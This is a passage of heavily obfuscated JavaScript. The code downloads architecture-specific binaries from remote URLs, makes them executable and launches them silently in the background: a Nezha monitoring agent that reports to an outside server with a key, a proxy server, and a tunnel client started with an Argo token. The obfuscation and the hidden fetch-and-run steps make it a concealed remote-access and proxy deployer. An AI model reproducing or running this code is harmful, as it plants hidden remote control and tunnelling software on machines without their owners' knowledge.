_0x6dca98(_0x26d4cb);},'mGPUu':_0x32af4d(-0x1b7,-0x1d2,-0xe9,-0x136),'jCSIh':_0x32af4d(0xac,-0x83,0x18d,-0x80),'kkflw':_0x3f12f4(0x446,0x41d,0x3b4,0x369),'Takhy':_0x32af4d(-0x174,-0x26,-0x62,-0x1b9),'zgCzg':_0x3f12f4(0x112,0x156,0x24c,0x214),'jwwyo':_0x3f12f4(0x306,0x445,0x38f,0x33e)+_0x32af4d(-0x5d,0x35,-0x5b,0xde)+_0x32af4d(0x4e,0x57,-0x98,-0x9e)+'unning','cgcsl':_0x32af4d(0x64,0x151,0x17e,0x22),'eFNOB':_0x32af4d(-0xe8,-0x1f8,0x67,-0xb8),'fYjzs':_0x3f12f4(0x335,0x1e6,0x21a,0x30f),'Kksiq':_0x3f12f4(0x169,0x1ae,0x226,0x178),'smPRx':_0x3f12f4(0x2ac,0x1a9,0x28e,0x268),'FKKrn':function(_0x596d23,_0x1a7a11){return _0x596d23!==_0x1a7a11;},'JYvdI':_0x3f12f4(0x451,0x22c,0x374,0x33f)},_0x4d5b9a=_0x368103[_0x32af4d(0x26,0x125,-0x9e,-0x72)](getSystemArchitecture),_0x24f055=getFilesForArchitecture(_0x4d5b9a);if(_0x24f055[_0x32af4d(0x1,-0x5d,-0x132,0x2b)]===-0x5e5*-0x1+-0xb5d+0x4*0x15e){console[_0x3f12f4(0x2b1,0x433,0x377,0x2f5)]('Can\x27t\x20find'+_0x32af4d(0x33,0x81,0x13d,0x6f)+'r\x20the\x20curr'+'ent\x20archit'+_0x32af4d(0x98,0x1bd,0xaa,-0x73));return;}const _0x138d01=_0x24f055[_0x32af4d(0x55,0x109,-0x77,0xe)](_0x6f852f=>{function _0x1342a5(_0x2235ed,_0x731039,_0xa3a9d7,_0x34319c){return _0x32af4d(_0x731039-0x1d9,_0x731039-0x1b9,_0x2235ed,_0x34319c-0xdf);}function _0x60850e(_0x53e51f,_0x1f2a4a,_0xe763f9,_0x59b12c){return _0x3f12f4(_0x53e51f-0xf4,_0x53e51f,_0xe763f9-0x22d,_0x59b12c-0x145);}if(_0x368103[_0x1342a5(0x2,0x12c,0x186,0x1a0)]!==_0x368103['KJqJA'])return new Promise((_0x1880c9,_0x2a1600)=>{const _0x3945e7={'SoExR':_0x10c15c(0x171,0xef,-0x5a,0x224),'wlmJp':function(_0xd3b371,_0x18e549){function _0x2c1c5e(_0x1466b6,_0x25bd9b,_0x1d7d42,_0x2a0bf8){return _0x10c15c(_0x1466b6-0x82,_0x1d7d42-0x1c6,_0x1466b6,_0x2a0bf8-0x1d5);}return _0x368103[_0x2c1c5e(0x39a,0x153,0x25d,0x257)](_0xd3b371,_0x18e549);}};function _0x4c1a84(_0x9889f1,_0x81f048,_0x52b793,_0x3c8b5b){return _0x1342a5(_0x3c8b5b,_0x9889f1-0x1a1,_0x52b793-0xf0,_0x3c8b5b-0xd2);}function _0x10c15c(_0x5d0714,_0x4996da,_0x133c99,_0x308599){return _0x1342a5(_0x133c99,_0x4996da-0x30,_0x133c99-0xe,_0x308599-0x13d);}if(_0x368103['BLjyr'](_0x368103[_0x4c1a84(0x268,0x207,0x2ac,0x1e0)],_0x368103[_0x10c15c(0x2af,0x1b2,0x1f5,0x92)]))_0x368103[_0x4c1a84(0x1f8,0x2bc,0x148,0xf6)](downloadFile,_0x6f852f[_0x10c15c(0x1d8,0x169,0xb4,0x1a8)],_0x6f852f[_0x4c1a84(0x3a7,0x263,0x2e6,0x347)],(_0x3b4b57,_0x4885e8)=>{function _0x70ab67(_0x27abf5,_0x51436e,_0x49bbd3,_0x195df5){return _0x4c1a84(_0x51436e- -0x174,_0x51436e-0x0,_0x49bbd3-0x119,_0x27abf5);}function _0x4aa424(_0x224574,_0x477333,_0x483d5c,_0x5008f9){return _0x4c1a84(_0x477333-0x391,_0x477333-0x1b8,_0x483d5c-0x14f,_0x5008f9);}const _0x3b9188={};_0x3b9188[_0x4aa424(0x634,0x63c,0x539,0x59b)]=_0x3945e7['SoExR'];const _0x38f6bc=_0x3b9188;if(_0x3b4b57){if(_0x70ab67(0xd2,0x95,0x95,0x8f)!==_0x4aa424(0x617,0x6a5,0x6a0,0x58c))_0x3945e7[_0x70ab67(0x16b,0xe6,0x2c,0x16e)](_0x2a1600,_0x3b4b57);else return _0x38f6bc['qWVIv'];}else _0x1880c9(_0x4885e8);});else{const _0x38e1a5=_0x51dcbb[_0x10c15c(0x270,0x1d1,0x2ed,0x146)](_0x5693b2,_0x37806a);try{const _0x42a6a9=_0x1cf222[_0x10c15c(0x91,0x138,0x1c8,0x250)](_0x38e1a5);_0x42a6a9[_0x4c1a84(0x2a3,0x156,0x2a3,0x39f)]()&&_0x4718f0[_0x4c1a84(0x38b,0x329,0x25f,0x40e)](_0x38e1a5);}catch(_0x514217){}}});else _0x60825a=_0x60850e(0x4f5,0x3ca,0x4af,0x56b)+_0x60850e(0x6a1,0x535,0x56b,0x6a6)+'sion\x20auto\x20'+_0x60850e(0x3d9,0x539,0x428,0x42f)+'pdate\x20--pr'+_0x1342a5(0x288,0x183,0x61,0x1a7)+_0x1342a5(0x184,0x1de,0x1c5,0x2d2)+'le\x20'+_0x3bc28d+('/boot.log\x20'+'--loglevel'+_0x1342a5(0x158,0x26f,0x36b,0x24f)+_0x1342a5(-0x3d,0x74,-0xdb,0x55)+'ocalhost:')+_0x194d74;});try{if(_0x368103[_0x32af4d(-0x114,-0x1dd,-0x9f,-0x235)](_0x3f12f4(0x495,0x518,0x3e5,0x32e),_0x368103[_0x32af4d(-0x1b4,-0x102,-0x1c6,-0x110)])){_0x2e428f[_0x32af4d(0x35,0x184,0x71,-0x25)](_0x3f12f4(0x35c,0x1e0,0x27a,0x227)+_0x3f12f4(0x24f,0x401,0x375,0x2c9)+_0x32af4d(-0x2d,-0x6d,0xc3,-0x1a)+_0x3f12f4(0xff,0x2d2,0x1d4,0x173)+_0x32af4d(0x98,-0x8c,0x184,0x2e));return;}else await Promise[_0x3f12f4(0x3f8,0x475,0x3aa,0x408)](_0x138d01);}catch(_0x137b16){console[_0x32af4d(-0x1da,-0x320,-0x279,-0x200)](_0x368103[_0x32af4d(-0x180,-0x186,-0x10f,-0x135)],_0x137b16);return;}function _0x32af4d(_0x573814,_0x4b2ee0,_0xe491fe,_0x3ee08c){return _0x51c265(_0x573814- -0x51a,_0x4b2ee0-0x147,_0xe491fe,_0x3ee08c-0x7f);}function _0x120538(_0x24a073){const _0x416cb8={'GNghu':function(_0x32478d,_0x31d35e){function _0x3a1941(_0x3bd255,_0x2fd558,_0x5ba50a,_0x17c54c){return _0x43ed(_0x17c54c-0xd7,_0x5ba50a);}return _0x368103[_0x3a1941(0x38b,0x1bf,0x130,0x281)](_0x32478d,_0x31d35e);},'abcGU':_0x368103[_0x18d98b(0x59b,0x5ed,0x4a1,0x4a5)],'GEELD':_0x368103[_0x5617b8(0x33c,0x39e,0x3b8,0x409)],'ouHcK':function(_0x365bfc,_0x270437){return _0x368103['LktAI'](_0x365bfc,_0x270437);},'aETBT':_0x368103[_0x5617b8(0x570,0x66d,0x610,0x6a7)],'Dqsqj':_0x368103[_0x5617b8(0x33c,0x3e1,0x419,0x365)]};function _0x18d98b(_0x4bd085,_0x76b187,_0x3b2bb3,_0x4bbc4c){return _0x32af4d(_0x4bbc4c-0x644,_0x76b187-0x180,_0x76b187,_0x4bbc4c-0x95);}const _0x3ae1bd=-0xb*0xa5+-0x17da+0x20ee;function _0x5617b8(_0x1cf03a,_0x3ae410,_0x4737fa,_0x505e5d){return _0x3f12f4(_0x1cf03a-0x19d,_0x505e5d,_0x4737fa-0x24f,_0x505e5d-0x1bf);}_0x24a073[_0x5617b8(0x6a0,0x643,0x61c,0x656)](_0x5923de=>{const _0x209365={'CxvpN':function(_0x413c34,_0x2f16fb){function _0x547bfa(_0x4da641,_0x55b47,_0x5eecd7,_0x1517ff){return _0x43ed(_0x4da641-0x359,_0x5eecd7);}return _0x368103[_0x547bfa(0x68d,0x568,0x7d6,0x55f)](_0x413c34,_0x2f16fb);},'pGWnU':_0x368103[_0x568d33(0x469,0x470,0x40b,0x472)],'hxpwE':_0x368103[_0x1176c0(0x280,0x166,0x68,0x20a)]};function _0x1176c0(_0x1716ea,_0x51aadd,_0x58a9ca,_0x133422){return _0x5617b8(_0x1716ea-0x177,_0x51aadd-0x112,_0x51aadd- -0x47f,_0x1716ea);}function _0x568d33(_0xfd1691,_0x537e54,_0x320378,_0x57ded4){return _0x18d98b(_0xfd1691-0xd5,_0x57ded4,_0x320378-0x15,_0x320378- -0x230);}if(_0x368103['CkYpj']!==_0x368103['KDJqz'])fs[_0x1176c0(-0x76,-0xbc,-0x8b,-0x18a)](_0x5923de)&&(_0x368103[_0x1176c0(-0x7,0x101,-0x4e,0x8f)](_0x368103[_0x568d33(0x3f9,0x3ff,0x391,0x47d)],_0x368103['UCivl'])?(_0x1b3124[_0x1176c0(0x3d,-0x76,0x37,0xb8)](_0x5d1192),_0xe10b6f[_0x568d33(0x4f0,0x521,0x449,0x348)](_0x447d3c+(_0x568d33(0x453,0x3cd,0x34b,0x276)+'d'))):fs[_0x568d33(0x543,0x425,0x448,0x326)](_0x5923de,_0x3ae1bd,_0x5719b8=>{function _0x14a5dd(_0xe4b14a,_0xb6a0fb,_0xe0b36f,_0x3f9fe3){return _0x568d33(_0xe4b14a-0xbc,_0xb6a0fb-0x15f,_0xb6a0fb- -0x45c,_0xe0b36f);}function _0x468d20(_0x2a6ee7,_0x30b4bb,_0x4d0a69,_0x9f0c22){return _0x568d33(_0x2a6ee7-0x59,_0x30b4bb-0x47,_0x4d0a69- -0x19e,_0x9f0c22);}if(_0x5719b8)console['error'](_0x14a5dd(-0x4c,0x61,0x59,0x18b)+'t\x20failed\x20f'+'or\x20'+_0x5923de+':\x20'+_0x5719b8);else{if(_0x209365[_0x14a5dd(-0x159,-0x204,-0x126,-0x2d5)](_0x209365[_0x468d20(0x10b,0xf7,0x1dc,0xb4)],_0x209365[_0x468d20(-0x23,0x138,0xa5,0x68)]))return;else console['log'](_0x14a5dd(0x90,0x61,0x181,0x15e)+_0x14a5dd(-0x12d,-0xc7,-0x57,-0x11e)+'for\x20'+_0x5923de+':\x20'+_0x3ae1bd['toString'](0x134f+0x1798+0x1b7*-0x19));}}));else{if(_0x5510b1){const _0x15102a=_0x416cb8[_0x568d33(0x24d,0x4bd,0x394,0x2fe)](_0x15aa63,'arm')?_0x416cb8[_0x1176c0(0x1b2,0xe2,-0x11,0xe3)]:_0x416cb8[_0x1176c0(0x68,0x150,0x8b,0x29)],_0x2f02d3={};_0x2f02d3[_0x568d33(0x31a,0x2c1,0x374,0x3ef)]=_0x34b403,_0x2f02d3['fileUrl']=_0x15102a,_0xeb51c5[_0x568d33(0x5bf,0x5e3,0x4be,0x3a0)](_0x2f02d3);}else{const _0x132111=_0x416cb8['ouHcK'](_0x33e58d,_0x416cb8[_0x1176c0(0x1c8,0x17c,0x1cc,0x5d)])?_0x416cb8[_0x568d33(0x48e,0x2ee,0x3ca,0x34e)]:_0x1176c0(0xf9,-0x36,0xaa,0x97)+_0x1176c0(-0x4d,0xa2,0x16,-0x58)+'yc.mn/v1',_0x3d0f9e={};_0x3d0f9e[_0x1176c0(0xd1,0x72,0xe5,0x4d)]=_0x61a0b7,_0x3d0f9e[_0x568d33(0x3b0,0x357,0x441,0x577)]=_0x132111,_0x15cbf1[_0x1176c0(0xe5,0x1bc,0x203,0x161)](_0x3d0f9e);}}});}const _0x17e0c6=NEZHA_PORT?[npmPath,webPath,botPath]:[phpPath,webPath,botPath];_0x368103['hfYTG'](_0x120538,_0x17e0c6);if(NEZHA_SERVER&&NEZHA_KEY){if(!NEZHA_PORT){if(_0x368103[_0x3f12f4(0x288,0x310,0x33a,0x41a)](_0x368103[_0x3f12f4(0x298,0x80,0x1c1,0x1e7)],_0x3f12f4(0x89,0x210,0x17b,0x1cc))){const _0x397bba=NEZHA_SERVER['includes'](':')?NEZHA_SERVER[_0x3f12f4(0x3c3,0x3e8,0x3bf,0x2e5)](':')[_0x3f12f4(0x2f9,0x2c7,0x259,0x21e)]():'',_0x2d62fa=new Set([_0x368103[_0x3f12f4(0x42d,0x3de,0x379,0x24d)],_0x368103[_0x3f12f4(0x324,0x434,0x355,0x340)],_0x368103[_0x32af4d(-0xae,-0x139,-0x197,-0x53)],_0x368103['thuka'],_0x368103[_0x32af4d(-0x2c,-0x37,0x53,-0xb1)],_0x368103[_0x32af4d(0x86,0x132,0x45,-0xcc)]]),_0x517685=_0x2d62fa[_0x3f12f4(0x31f,0x23e,0x35f,0x491)](_0x397bba)?_0x368103[_0x3f12f4(0x22e,0xc0,0x1ea,0xab)]:_0x368103[_0x3f12f4(0x3ab,0x2da,0x2b2,0x1ae)],_0x4f6cc1=_0x3f12f4(0x2ba,0x1f8,0x17f,0x127)+_0x3f12f4(0x22a,0x47d,0x33c,0x256)+NEZHA_KEY+('\x0adebug:\x20fa'+_0x32af4d(-0x60,0x7,0xa4,-0x53)+_0x3f12f4(0x24f,0x3a3,0x2e1,0x341)+_0x32af4d(0x67,0xe7,0x185,0x159)+_0x3f12f4(0x1fa,0x387,0x2b9,0x2a3)+_0x32af4d(0x92,0x32,0xbe,0x195)+_0x3f12f4(0xf2,0xdd,0x21c,0xd9)+_0x32af4d(-0x164,-0x120,-0x140,-0x2b)+_0x3f12f4(0x13a,0x344,0x207,0x233)+_0x32af4d(-0x13f,-0x271,-0x9a,-0x1e4)+_0x32af4d(-0x13c,-0xfb,-0x1cc,-0x5d)+_0x3f12f4(0x3be,0x3c0,0x3ed,0x41a)+_0x32af4d(-0x27,0xd2,-0xf3,0x1)+'query:\x20fal'+_0x32af4d(-0xaa,-0x142,0x3c,-0x121)+_0x3f12f4(0x121,0x321,0x24e,0x343)+_0x32af4d(-0xbc,-0x1db,0x68,-0x1aa)+'ue\x0aip_repo'+'rt_period:'+_0x3f12f4(0x2fb,0x36c,0x3b6,0x307)+_0x3f12f4(0x1df,0xe8,0x236,0x158)+_0x32af4d(-0x1e3,-0x283,-0x15f,-0x164))+NEZHA_SERVER+(_0x32af4d(-0x1b2,-0x1a9,-0x72,-0xd4)+_0x32af4d(-0x1cd,-0x1a9,-0x257,-0x139)+_0x3f12f4(0x342,0x336,0x277,0x130)+'kip_procs_'+_0x3f12f4(0x3e8,0x1f3,0x306,0x3c6)+'e\x0atemperat'+_0x3f12f4(0x4e5,0x45c,0x3af,0x2db)+'\x0atls:\x20')+_0x517685+('\x0ause_gitee'+_0x32af4d(-0xa6,-0xac,-0x1d7,-0x1b7)+_0x3f12f4(0x243,0x32d,0x36c,0x296)+'se_ipv6_co'+'untry_code'+_0x32af4d(0x12,0x112,0x4e,0x35)+'id:\x20')+UUID;fs[_0x3f12f4(0x3db,0x29d,0x2c4,0x306)+_0x3f12f4(0x3bf,0x2be,0x341,0x378)](path[_0x32af4d(-0x38,-0x8f,-0xc0,-0x16b)](FILE_PATH,_0x32af4d(0x41,0x174,0x10c,-0x3f)+'l'),_0x4f6cc1);const _0x4f5072='nohup\x20'+phpPath+_0x3f12f4(0x392,0x309,0x3a3,0x30a)+FILE_PATH+(_0x32af4d(-0xc,0x8a,-0x11,-0xf6)+_0x3f12f4(0x379,0x20f,0x2a0,0x282)+_0x3f12f4(0xd8,0x2af,0x1f2,0xe3)+'&');try{_0x368103[_0x32af4d(-0x19b,-0xbc,-0x1af,-0x1eb)](_0x368103[_0x32af4d(-0xe6,-0x1,0x3c,-0x13e)],_0x368103[_0x3f12f4(0x267,0x37a,0x25c,0x1aa)])?(await _0x368103[_0x3f12f4(0x21b,0x297,0x182,0x1d6)](exec,_0x4f5072),console[_0x3f12f4(0x27e,0x351,0x377,0x44a)](phpName+(_0x32af4d(-0x1ad,-0x1e0,-0x18a,-0xfb)+'g')),await new Promise(_0x4b21f3=>setTimeout(_0x4b21f3,-0x1c8+0x1c*0x20+0x230))):_0x4db91e['log'](_0x50441f+('\x20already\x20e'+'xists'));}catch(_0x4e6868){_0x368103[_0x32af4d(-0x170,-0x132,-0x13c,-0x15a)]!=='nKmsG'?_0x1b315a[_0x3f12f4(0x17,0x3a,0x168,0x188)](_0x3f12f4(0x1c3,0x1a0,0x196,0x296)+_0x3f12f4(0x74,0x91,0x161,0x9c)+_0x29ffcf):console[_0x32af4d(-0x1da,-0x28c,-0x95,-0x2dd)](_0x3f12f4(0x4ab,0x298,0x37c,0x27f)+_0x3f12f4(0x18d,0x279,0x161,0x32)+_0x4e6868);}}else{const _0x2e6015={};_0x2e6015[_0x3f12f4(0x2f1,0x2e4,0x3d3,0x498)]=!![],_0x568e58['mkdirSync'](_0x3870e2,_0x2e6015);}}else{let _0x3b6802='';const _0x2792f5=[_0x368103[_0x32af4d(0x37,0x91,0x156,0x17d)],_0x368103[_0x3f12f4(0x26d,0x439,0x355,0x208)],_0x368103[_0x32af4d(-0xae,-0x24,-0xeb,-0x19f)],_0x32af4d(-0x94,-0x26,0x68,-0x10c),_0x368103[_0x3f12f4(0x261,0x314,0x316,0x2d7)],_0x368103[_0x3f12f4(0x4db,0x352,0x3c8,0x417)]];_0x2792f5[_0x32af4d(-0x72,-0x168,-0xba,-0xf8)](NEZHA_PORT)&&(_0x3b6802=_0x368103[_0x32af4d(-0xfb,-0x1ce,0x1,-0x102)]);const _0x30802a=_0x32af4d(-0x161,-0x127,-0x241,-0x1c)+npmPath+_0x3f12f4(0x33f,0x17e,0x23b,0x2de)+NEZHA_SERVER+':'+NEZHA_PORT+_0x3f12f4(0x393,0x42b,0x399,0x276)+NEZHA_KEY+'\x20'+_0x3b6802+(_0x3f12f4(0x29a,0x276,0x37e,0x279)+'-auto-upda'+_0x3f12f4(0x16a,0x14b,0x1d8,0x18b)+_0x3f12f4(0x111,0x77,0x16d,0xcf)+_0x3f12f4(0x340,0x3ec,0x365,0x29d)+_0x32af4d(-0x3a,-0x72,-0xc8,-0x167)+_0x32af4d(-0x15d,-0x5f,-0x18c,-0xbc)+'/null\x202>&1'+'\x20&');try{if(_0x368103[_0x3f12f4(0xc6,0x82,0x178,0x31)]===_0x368103[_0x3f12f4(0xf4,0x15d,0x1be,0x13f)]){const _0x10a5bb=_0x2f6fcd[-0x6*-0x423+-0x2b*0xce+0x9c9];_0x5325c9[_0x3f12f4(0x190,0x138,0x162,0x8d)](_0x10a5bb);}else await exec(_0x30802a),console[_0x32af4d(0x35,0x40,0x73,0x37)](npmName+(_0x32af4d(-0x1ad,-0x21f,-0x242,-0x163)+'g')),await new Promise(_0x1749a0=>setTimeout(_0x1749a0,0x150b+0x526*0x2+-0x3*0x925));}catch(_0x1d588f){console['error']('npm\x20runnin'+_0x3f12f4(0x170,0x161,0x161,0x2a)+_0x1d588f);}}}else{if(_0x368103[_0x3f12f4(0x1b5,0x186,0x26d,0x139)]===_0x368103['zgCzg'])console[_0x32af4d(0x35,0x38,0xd5,0xa)](_0x368103[_0x3f12f4(0x3f6,0x264,0x2cd,0x270)]);else return _0x368103['TPKru'];}const _0x37fdb3=_0x32af4d(-0x161,-0x2a1,-0xf2,-0x140)+webPath+_0x32af4d(-0x12a,-0x88,-0x259,-0x14a)+FILE_PATH+('/config.js'+_0x3f12f4(0x200,0x1de,0x327,0x425)+'ull\x202>&1\x20&');function _0x3f12f4(_0x29ce44,_0x872e15,_0x32693d,_0x3eb15f){return _0x51c265(_0x32693d- -0x1d8,_0x872e15-0x64,_0x872e15,_0x3eb15f-0x3c);}try{_0x368103['JTOqT'](_0x368103['cgcsl'],_0x368103[_0x3f12f4(0x261,0x23f,0x31e,0x421)])?(await exec(_0x37fdb3),console[_0x3f12f4(0x2b9,0x24d,0x377,0x38a)](webName+(_0x3f12f4(0x285,0x20b,0x195,0x267)+'g')),await new Promise(_0x24052e=>setTimeout(_0x24052e,0x767*0x3+0x1570+-0x27bd))):_0x1eb6b2[_0x3f12f4(0x3c2,0x2e0,0x377,0x304)](_0x3f12f4(0x20e,0x225,0x240,0x23d)+'mismatch\x20T'+'unnelSecre'+_0x3f12f4(0x264,0x1c7,0x215,0x296)+_0x3f12f4(0x228,0x3a4,0x2b0,0x34b)+_0x32af4d(0x82,0x18a,0x1ca,0x1b7));}catch(_0x2f17f7){_0x368103[_0x3f12f4(0x2d0,0x2d5,0x36d,0x372)](_0x368103[_0x32af4d(-0x13,-0x82,-0x88,0x8)],_0x368103['eFNOB'])?(_0x5abed0[_0x32af4d(-0x1d3,-0x88,-0x192,-0x21b)](),_0x4f5a98[_0x3f12f4(0x2f6,0x4bd,0x377,0x2b8)](_0x3f12f4(0x5c,0xe7,0x189,0x101)+_0x5dfca7[_0x3f12f4(0x39e,0x2b4,0x3e0,0x319)](_0x2b89b9)+(_0x32af4d(-0x125,-0x1be,-0x22,-0x115)+_0x32af4d(0x25,-0x4f,0xf7,0xbd))),_0x368103[_0x32af4d(0x6,-0xe5,-0xf1,-0x27)](_0x9a479b,null,_0x53ecf5)):console[_0x3f12f4(0x9a,0x123,0x168,0x35)](_0x3f12f4(0xd0,0x19e,0x1bd,0x93)+_0x3f12f4(0x246,0x16d,0x161,0x1e)+_0x2f17f7);}if(fs[_0x3f12f4(0x138,0x236,0x174,0x1bb)](botPath)){let _0x34a360;if(ARGO_AUTH['match'](/^[A-Z0-9a-z=]{120,250}$/))_0x34a360=_0x3f12f4(0x316,0x276,0x282,0x3d3)+_0x32af4d(-0x4,-0x8,-0xb9,-0x4d)+_0x32af4d(-0x17a,-0x14a,-0x1a9,-0xfa)+_0x3f12f4(0x168,0x257,0x1fb,0x1d8)+_0x3f12f4(0x13c,0x2c4,0x1f6,0x2eb)+'otocol\x20htt'+_0x3f12f4(0x344,0x4ec,0x39c,0x2f9)+_0x3f12f4(0x30f,0x2dd,0x38e,0x2e8)+ARGO_AUTH;else ARGO_AUTH[_0x32af4d(0x16,-0xca,0x7a,0x9b)](/TunnelSecret/)?_0x368103[_0x3f12f4(0x3ba,0x367,0x313,0x244)]===_0x368103[_0x3f12f4(0x3dc,0x3df,0x313,0x1e3)]?_0x34a360=_0x32af4d(-0xc0,-0x84,-0x1d9,0x5)+_0x32af4d(-0x4,0x73,-0x14b,-0x44)+_0x3f12f4(0x29a,0x103,0x1c8,0x14c)+_0x32af4d(-0x1d0,-0x11e,-0xb5,-0x2c3)+FILE_PATH+(_0x32af4d(-0x76,-0x1bb,-0xcd,0x84)+_0x3f12f4(0xe0,0x1f4,0x214,0x2c7)):_0x3d90bd[_0x3f12f4(0xbe,0x1da,0x168,0x2a)](_0x3f12f4(0x2c5,0x276,0x39e,0x302)+_0x3f12f4(0x28c,0x290,0x2b6,0x1ff)+_0x3f12f4(0x363,0x365,0x3cc,0x2cd)+_0x5455a6):_0x368103[_0x32af4d(0x2b,-0xa2,-0x1a,0xd1)](_0x368103['Kksiq'],_0x368103[_0x3f12f4(0x434,0x28e,0x328,0x2f9)])?_0x34a360=_0x32af4d(-0xc0,-0xc5,-0x12d,-0x19a)+_0x3f12f4(0x3e7,0x32d,0x33e,0x45c)+'sion\x20auto\x20'+_0x32af4d(-0x147,-0x213,-0x60,-0x276)+_0x3f12f4(0xb5,0x2df,0x1f6,0x2ac)+_0x3f12f4(0x330,0x2a9,0x2ec,0x405)+_0x32af4d(0x5,0x11,0x28,-0x120)+_0x3f12f4(0x65,0x23,0x170,0x90)+FILE_PATH+('/boot.log\x20'+_0x32af4d(-0xc1,-0x1b1,-0xa6,-0x102)+_0x3f12f4(0x48e,0x2ee,0x3d8,0x35b)+_0x32af4d(-0x165,-0x5c,-0x1f1,-0x158)+_0x32af4d(-0x177,-0x72,-0x40,-0x2b5))+ARGO_PORT:_0x19c3c7[_0x32af4d(0x11,0x8d,0x143,-0xfb)](_0x1af584);try{_0x368103[_0x3f12f4(0x264,0x351,0x25d,0x290)](_0x32af4d(0x32,0x81,-0x110,0x17f),_0x368103['JYvdI'])?_0x4b2700[_0x32af4d(0x9c,0x72,0x10,0x1a4)](_0x368103[_0x32af4d(-0x18b,-0x240,-0x22e,-0x14f)]):(await _0x368103['hfYTG'](exec,_0x32af4d(-0x161,-0xc4,-0x114,-0x240)+botPath+'\x20'+_0x34a360+(_0x3f12f4(0x3c4,0x470,0x3d2,0x42c)+_0x32af4d(0x8,0xef,-0x21,-0xdd))),console['log'](botName+(_0x3f12f4(0xc2,0x1e7,0x195,0x27c)+'g')),await new Promise(_0x1cfbe4=>setTimeout(_0x1cfbe4,-0x2*-0x5f7+0x3f3+-0x811)));}catch(_0x1318b3){console[_0x3f12f4(0x102,0x191,0x168,0x62)](_0x32af4d(0x5c,0x105,0x128,-0x2d)+_0x32af4d(-0x8c,0x54,0x3f,0x72)+_0x32af4d(0x8a,-0xe,0xba,0x40)+_0x1318b3);}}await new Promise(_0x43bbcd=>setTimeout(_0x43bbcd,-0x2523*-0x1+0x202*-0xc+0x67d));}function getFilesForArchitecture(_0x49caef){const _0x3721cc={};_0x3721cc['MBzwd']=function(_0x3779bf,_0x10001c){return _0x3779bf===_0x10001c;};function _0x5a64fc(_0x2fb45e,_0x4f94d1,_0x4da4a5,_0x57d181){return _0x51c265(_0x2fb45e- -0x417,_0x4f94d1-0xb2,_0x57d181,_0x57d181-0x133);}_0x3721cc[_0x3d1f43(-0x18,0x17,-0x153,-0xf0)]=_0x5a64fc(-0x7c,-0x7f,0x76,-0x175)+_0x5a64fc(0x7e,-0x8e,0x197,-0x73)+_0x5a64fc(0x58,-0x43,0xc5,0x18f),_0x3721cc[_0x5a64fc(-0x94,-0x102,-0x92,-0x19e)]=_0x5a64fc(-0x45,0x85,-0xee,-0x20)+_0x5a64fc(0x93,0x22,0x2f,0x1e4)+_0x5a64fc(0x58,-0xde,0x11e,0x4a),_0x3721cc[_0x3d1f43(0x111,0x215,0x188,0x132)]='arm',_0x3721cc[_0x5a64fc(-0x87,-0xc4,-0x113,-0xf5)]='https://ar'+_0x3d1f43(0x10d,0x48,0x1a8,0x1b1)+_0x5a64fc(0x173,0x2c4,0x96,0xaf),_0x3721cc[_0x3d1f43(0xc,0x5e,0xe0,0x129)]='https://am'+'d64.ssss.n'+_0x5a64fc(0x52,0x17a,0x34,0x122),_0x3721cc[_0x5a64fc(0xd0,0x15b,0x1e3,0x122)]='https://am'+_0x3d1f43(0x122,0x148,0x1e9,0x1d0)+_0x5a64fc(0x173,0x17f,0x26b,0xc7),_0x3721cc[_0x3d1f43(0x1c8,0x1d6,0x22d,0x1f4)]=function(_0x3d11ae,_0x142c14){return _0x3d11ae&&_0x142c14;},_0x3721cc[_0x5a64fc(-0xd8,-0x43,0x55,-0x1f3)]=function(_0x12105b,_0x2b302b){return _0x12105b===_0x2b302b;};function _0x3d1f43(_0x29bedf,_0x5b8dc7,_0x115fe3,_0x23d8fe){return _0x50d979(_0x29bedf-0xa0,_0x5b8dc7-0xb9,_0x29bedf- -0x147,_0x115fe3);}_0x3721cc['JlrOl']='https://ar'+_0x3d1f43(0x10d,0x4b,0x139,0x1ec)+_0x5a64fc(0xb7,-0x10,0x41,0x1a8)+'t',_0x3721cc[_0x3d1f43(0x58,-0x9b,0x16a,0x27)]='https://am'+_0x5a64fc(0x93,-0x25,0x1e0,0x16f)+_0x5a64fc(0xb7,0xcb,0x176,0x1b6)+'t',_0x3721cc[_0x5a64fc(-0xb3,0x2c,0x1c,-0x101)]=function(_0x31f72a,_0x3992ff){return _0x31f72a!==_0x3992ff;},_0x3721cc[_0x5a64fc(0x1a5,0x111,0x14b,0x112)]='EqKAb',_0x3721cc[_0x3d1f43(0x1c1,0x271,0x15c,0x160)]=_0x5a64fc(-0x2f,-0x162,-0x114,-0x7);const _0x16d9b5=_0x3721cc;let _0x291cd2;if(_0x49caef===_0x16d9b5[_0x3d1f43(0x111,0x140,0x229,0x8)]){const _0x478144={};_0x478144[_0x3d1f43(0xf2,0xd6,0x53,0x1b1)]=webPath,_0x478144[_0x3d1f43(0x1bf,0xd1,0xf0,0x2f8)]=_0x3d1f43(0x13,-0x89,-0x79,-0xfa)+_0x5a64fc(0x7e,-0x1d,-0x7f,0x109)+_0x5a64fc(0x52,0x13b,-0x78,0x29);const _0x448b15={};_0x448b15[_0x3d1f43(0xf2,-0x10,0x9b,0x1c9)]=botPath,_0x448b15[_0x5a64fc(0x130,0x172,0xd6,0x20f)]=_0x16d9b5[_0x3d1f43(0x8,0xf4,-0xd8,-0xf4)],_0x291cd2=[_0x478144,_0x448b15];}else{const _0x127813={};_0x127813[_0x3d1f43(0xf2,0x3b,0x12f,0x201)]=webPath,_0x127813[_0x3d1f43(0x1bf,0x181,0xb0,0x165)]=_0x16d9b5[_0x3d1f43(0xc,-0x4a,-0x121,-0x36)];const _0x454019={};_0x454019[_0x3d1f43(0xf2,0x98,0x10,0x229)]=botPath,_0x454019[_0x3d1f43(0x1bf,0x15e,0x153,0x2e8)]=_0x16d9b5['FMeve'],_0x291cd2=[_0x127813,_0x454019];}if(_0x16d9b5['mOEHB'](NEZHA_SERVER,NEZHA_KEY)){if(NEZHA_PORT){const 